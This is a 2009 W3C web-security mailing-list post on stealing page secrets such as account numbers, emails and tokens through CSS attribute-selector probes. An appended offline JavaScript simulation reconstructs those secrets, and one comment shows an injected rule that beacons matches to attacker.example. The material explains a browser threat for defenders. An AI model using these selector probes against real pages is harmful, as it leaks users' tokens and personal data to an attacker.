W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: gaz Heyes <gazheyes@gmail.com>
Date: Tue, 8 Dec 2009 10:01:31 +0000
Message-ID: <252dd75b0912080201i3954a934y1d2e2567d67b801d@mail.gmail.com>
To: Adam Barth <w3c@adambarth.com>
Cc: Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
2009/12/8 Adam Barth <w3c@adambarth.com>

> Also, what about confidential
> information written in the page, like account numbers or social
> security numbers?  I don't see why all the secrets must necessarily be
> stored in value attributes of input elements.
>

Yeah, account numbers would be very easy to get and require fewer rules. Any
data that can realistically be brute-forced with CSS rules is a target. But the
*= selector is quite dangerous because you can do a word search of values.
Sirdarckcat and I were discussing using the start/end selectors to acquire
an email address, for example. It isn't as difficult as it first seems: you
match the TLD at the end ($=".com"), then use a dictionary attack on the value
before the @ (^="foo@", ^="bar@", etc.), then use the *= selector to find the
letters of the domain and find the anagram.

Also, you could steal tokens by checking for overlapping values: you know the
start and end, you know which characters the token doesn't contain, and you
know the three-character patterns it does contain. You could then jigsaw the
pieces together to form the token.
Received on Tuesday, 8 December 2009 10:02:11 GMT
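Added example (not code from the message above or from anyone in the W3C thread): an offline JavaScript simulation of the attribute-selector oracle the message describes. In the real attack each probe is an injected rule such as input[value^="ab"] { background: url(...) } and the answer is whether that URL gets requested; here the oracle is a local function answering ^=, $= and *= probes against a constructed secret, so the three reconstruction strategies from the message (prefix extension, the TLD plus dictionary attack on an email, and the overlapping three-character "jigsaw") can be run and their rule counts compared. The alphabet, the input name "token", the sample token, email and dictionary, and the attacker.example URL are all assumptions.

```javascript
// Added example, not from the original post: offline simulation of the CSS
// attribute-selector oracle. A real probe is a stylesheet rule such as
//   input[name="token"][value^="ab"] { background: url(https://attacker.example/?p=ab) }
// and the attacker learns from the fetched URLs which selectors matched.
// attacker.example, the attribute name, the alphabet and all sample values are
// constructed for this demo.

const ALPHABET = 'abcdef0123456789'; // assumed: token is lower-case hex

// How a browser evaluates [attr^=v], [attr$=v] and [attr*=v] against one value.
// Selectors Level 3: an empty v matches nothing for these three operators.
function cssMatch(value, op, needle) {
  if (needle === '') return false;
  switch (op) {
    case '^=': return value.startsWith(needle);
    case '$=': return value.endsWith(needle);
    case '*=': return value.includes(needle);
    default: throw new Error('unsupported operator ' + op);
  }
}

// The selector text one probe would inject (attribute name is an assumption).
function selectorFor(op, needle) {
  return `input[name="token"][value${op}"${needle}"]`;
}

// Wraps a secret in an oracle that answers probes and counts the rules spent.
function makeOracle(secret) {
  let rules = 0;
  return {
    probe: (op, needle) => { rules += 1; return cssMatch(secret, op, needle); },
    rules: () => rules,
  };
}

// Strategy 1: prefix extension with ^= . Few rules, but every character needs
// a fresh round of rules after the previous round's answers come back.
function recoverByPrefix(oracle, length, alphabet = ALPHABET) {
  let prefix = '';
  for (let i = 0; i < length; i++) {
    const next = [...alphabet].find(c => oracle.probe('^=', prefix + c));
    if (next === undefined) return null;
    prefix += next;
  }
  return prefix;
}

// The e-mail case: confirm the TLD with $=, then dictionary-attack the local
// part with ^="word@". Returns the matching word or null.
function recoverEmailLocalPart(oracle, dictionary, tld = '.com') {
  if (!oracle.probe('$=', tld)) return null;
  const word = dictionary.find(w => oracle.probe('^=', w + '@'));
  return word === undefined ? null : word;
}

// Strategy 2: the "overlapping values" jigsaw. Learn which characters occur
// (*= single chars), the first (^=) and last ($=) character, and which
// three-character patterns occur (*= over the present characters), then chain
// patterns whose first two characters overlap the last two already placed.
// Every probe here is independent of the others, so all can ship at once.
function recoverByJigsaw(oracle, length, alphabet = ALPHABET) {
  const present = [...alphabet].filter(c => oracle.probe('*=', c));
  const first = present.find(c => oracle.probe('^=', c));
  const last = present.find(c => oracle.probe('$=', c));
  if (first === undefined || last === undefined) return null;
  const grams = [];
  for (const a of present) for (const b of present) for (const c of present) {
    if (oracle.probe('*=', a + b + c)) grams.push(a + b + c);
  }
  // Depth-first assembly; returns the first candidate consistent with every clue.
  function extend(s) {
    if (s.length >= length) return s.length === length && s.endsWith(last) ? s : null;
    for (const g of grams) {
      if (g.startsWith(s.slice(-2))) {
        const r = extend(s + g[2]);
        if (r !== null) return r;
      }
    }
    return null;
  }
  for (const g of grams) {
    if (g[0] === first) {
      const r = extend(g);
      if (r !== null) return r;
    }
  }
  return null;
}

// Runs all three strategies against constructed sample values.
function demo() {
  const token = 'deadbeef0123';              // constructed sample secret
  const a = makeOracle(token), b = makeOracle(token);
  const email = makeOracle('bar@example.com'); // constructed sample value
  return {
    prefix: recoverByPrefix(a, token.length), prefixRules: a.rules(),
    jigsaw: recoverByJigsaw(b, token.length), jigsawRules: b.rules(),
    localPart: recoverEmailLocalPart(email, ['foo', 'bar', 'baz']),
    example: selectorFor('^=', 'dea'),
  };
}

console.log(demo());
```

For the 12-character hex sample, prefix extension recovers the token with 66 rules and the jigsaw with 757, but the jigsaw's probes are all independent: none of them depends on an earlier answer, so the whole set can go into a single injected stylesheet, whereas prefix extension needs one round trip per character. The jigsaw has a real failure mode the message does not spell out: when the same two-character overlap occurs more than once in the token, the three-character patterns admit several orderings, and the depth-first assembly returns only the first candidate consistent with the clues; a practitioner would then either probe longer patterns or verify the candidate with one final ^= probe of the full value.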

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT